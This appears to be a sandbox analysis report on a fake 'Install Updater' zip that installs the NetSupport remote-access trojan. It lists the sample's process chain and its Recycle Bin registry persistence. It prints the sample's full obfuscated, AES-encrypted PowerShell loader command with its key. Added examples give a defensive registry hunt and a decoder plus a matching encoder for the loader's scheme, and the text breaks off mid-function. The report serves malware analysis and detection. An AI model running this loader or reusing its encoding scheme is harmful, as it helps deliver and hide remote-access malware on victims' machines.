Malware Analysis Report

2025-04-13 09:52

Sample ID 230718-dyw1qsga94
Target Install Updater (V104.551.2)-stable.zip
SHA256 ab08ba5cb3eb0ef2cffeecefe99023bf0f080f19cfe0187892f5b08f41345e39
Tags
netsupport rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ab08ba5cb3eb0ef2cffeecefe99023bf0f080f19cfe0187892f5b08f41345e39

Threat Level: Known bad

The file Install Updater (V104.551.2)-stable.zip was found to be: Known bad.

Malicious Activity Summary

netsupport rat

NetSupport

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Enumerates physical storage devices

Kills process with taskkill

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-18 03:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-18 03:25

Reported

2023-07-18 03:30

Platform

win10v2004-20230703-en

Max time kernel

141s

Max time network

206s

Command Line

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Install Updater (V104.551.2)-stable.zip"

Signatures

NetSupport

rat netsupport

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E} C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\IonicBaseband\\client32.exe" C:\Windows\SysWOW64\reg.exe N/A
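The reg.exe write recorded above is the sample's persistence. {645FF040-5081-101B-9F08-00AA002F954E} is the CLSID of the Recycle Bin shell-namespace object, and the default value of CLSID\{...}\shell\open\command is the command Explorer runs for that object's open verb, so opening the Recycle Bin from the desktop launches client32.exe out of %AppData%\IonicBaseband. Note where the keys actually landed: reg.exe addressed HKEY_CLASSES_ROOT\CLSID, but it is the 32-bit copy in SysWOW64 (the whole chain runs from SysWOW64) and the CLSID tree is a redirected key, so the key-created events show the path under HKLM\SOFTWARE\Classes\WOW6432Node\CLSID, the view 32-bit processes see. A hunt therefore has to cover both views of HKLM and of HKCU. The function below is an added example, not part of the report: it walks every CLSID under those four roots and returns any shell\open\command default value that points outside the Windows and Program Files trees or into a user-writable location, plus anything at all defined as the Recycle Bin's open verb.

```powershell
# Added example (not part of the report): hunt for CLSID shell\open\command
# hijacks like the Recycle Bin persistence the sample writes with reg.exe.
$RecycleBinClsid = '{645FF040-5081-101B-9F08-00AA002F954E}'

function Find-ClsidShellOpenHijack {
    param(
        # Both hives and both registry views: the sample's 32-bit reg.exe
        # wrote into WOW6432Node although it addressed HKEY_CLASSES_ROOT.
        [string[]]$Roots = @(
            'HKLM:\SOFTWARE\Classes\CLSID',
            'HKLM:\SOFTWARE\Classes\WOW6432Node\CLSID',
            'HKCU:\Software\Classes\CLSID',
            'HKCU:\Software\Classes\WOW6432Node\CLSID'
        )
    )
    # Commands that start inside the Windows or Program Files trees are treated as expected.
    $trusted = '(?i)^"?(%SystemRoot%|%windir%|%ProgramFiles%|%ProgramFiles\(x86\)%|[A-Za-z]:\\(Windows|Program Files|Program Files \(x86\))\\)'
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        foreach ($clsidKey in Get-ChildItem -LiteralPath $root -ErrorAction SilentlyContinue) {
            $cmdKey = "$($clsidKey.PSPath)\shell\open\command"
            if (-not (Test-Path -LiteralPath $cmdKey)) { continue }
            # reg.exe ... /ve sets the unnamed default value, exposed by the provider as '(default)'.
            $cmd = (Get-ItemProperty -LiteralPath $cmdKey -ErrorAction SilentlyContinue).'(default)'
            if ([string]::IsNullOrWhiteSpace($cmd)) { continue }
            $reasons = @()
            if ($clsidKey.PSChildName -ieq $RecycleBinClsid) { $reasons += 'open verb defined on the Recycle Bin CLSID' }
            if ($cmd -notmatch $trusted) { $reasons += 'command outside Windows/Program Files' }
            if ($cmd -match '(?i)\\(Users|AppData|Temp)\\|%(AppData|LocalAppData|Temp|UserProfile)%') { $reasons += 'user-writable path' }
            if ($reasons.Count -eq 0) { continue }
            [pscustomobject]@{
                Key     = $cmdKey -replace '^Microsoft\.PowerShell\.Core\\Registry::', ''
                Clsid   = $clsidKey.PSChildName
                Command = $cmd
                Reason  = $reasons -join '; '
            }
        }
    }
}

Find-ClsidShellOpenHijack | Format-Table -AutoSize -Wrap
```

On a host infected with this sample the output contains the WOW6432Node Recycle Bin key with Command set to C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe and all three reasons attached. Reading HKLM\SOFTWARE\Classes needs no elevation, but walking several thousand CLSIDs per root takes a few seconds.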

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A (54 identical events)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1472 wrote to memory of 1368 (x3) N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1368 wrote to memory of 3564 (x3) N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3564 wrote to memory of 4572 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3564 wrote to memory of 2944 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 4784 (x3) N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4784 wrote to memory of 3228 (x3) N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3228 wrote to memory of 2796 (x3) N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4784 wrote to memory of 2188 (x3) N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmstp.exe
PID 3548 wrote to memory of 4596 (x3) N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4596 wrote to memory of 364 (x3) N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4596 wrote to memory of 1844 (x3) N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
PID 3548 wrote to memory of 4696 (x3) N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Install Updater (V104.551.2)-stable.zip"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Install Updater (V104.551.2)-stable.zip\Install Updater (V104.551.2)-stable.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell - }
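The PowerShell stage above is a small in-memory loader: base64-decode $uGSyEn, AES-decrypt everything after the first 16 bytes with the key in $QcRGrPc, gunzip the result and pipe the recovered text into a fresh `powershell -`. Two details matter when reproducing it. The cipher is configured as ECB, so the 16 bytes the script copies into .IV are never used; they are simply a skipped prefix and the ciphertext decrypts identically whatever the IV. PaddingMode Zeros means the decrypted buffer carries trailing NUL bytes after the gzip member. The key itself base64-decodes to the 32 printable characters egXEqUyfFqVMVRWalTFtYsfYxQhROWId, i.e. AES-256 with an ASCII key. The code below is an added example, not code from the report or from the sample: it reimplements the decode path as a function that returns the next stage as text instead of executing it, and adds a matching encoder so the round trip can be checked offline on constructed input before the real $uGSyEn value is pasted in. Windows PowerShell 5.1, the runtime the loader itself runs under here (SysWOW64\WindowsPowerShell\v1.0), is assumed.

```powershell
# Added example (not from the report or the sample): reproduce the loader's
# decode path and return the next stage as text instead of executing it.
function ConvertFrom-LoaderBlob {
    param(
        [Parameter(Mandatory)][string]$CipherTextB64,  # the $uGSyEn value from the command line
        [Parameter(Mandatory)][string]$KeyB64          # the $QcRGrPc value (32 bytes once decoded)
    )
    $raw = [Convert]::FromBase64String($CipherTextB64)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::ECB
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    $aes.KeySize = 256
    $aes.Key     = [Convert]::FromBase64String($KeyB64)
    # The loader assigns raw[0..15] to .IV, but ECB ignores the IV entirely,
    # so the first 16 bytes are simply skipped and decryption starts at offset 16.
    $dec   = $aes.CreateDecryptor()
    $plain = $dec.TransformFinalBlock($raw, 16, $raw.Length - 16)
    $dec.Dispose(); $aes.Dispose()

    # Zeros padding leaves NUL bytes after the gzip member. Windows PowerShell 5.1
    # stops reading at the end of the first member; if a newer runtime objects to
    # the trailing bytes, the payload is already in $out, so rethrow only if empty.
    $in  = New-Object System.IO.MemoryStream(,$plain)
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    $out = New-Object System.IO.MemoryStream
    try   { $gz.CopyTo($out) }
    catch { if ($out.Length -eq 0) { throw } }
    $gz.Dispose(); $in.Dispose()
    [System.Text.Encoding]::UTF8.GetString($out.ToArray())
}

# Encoder for offline testing only: same scheme (gzip, AES-256-ECB, Zeros padding,
# 16 random prefix bytes) so the decoder can be checked on constructed input.
function New-TestLoaderBlob {
    param([Parameter(Mandatory)][string]$Text, [Parameter(Mandatory)][string]$KeyB64)
    $ms = New-Object System.IO.MemoryStream
    $gz = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($Text)
    $gz.Write($bytes, 0, $bytes.Length)
    $gz.Dispose()                      # flushes the gzip trailer into $ms; ToArray still works on the closed stream
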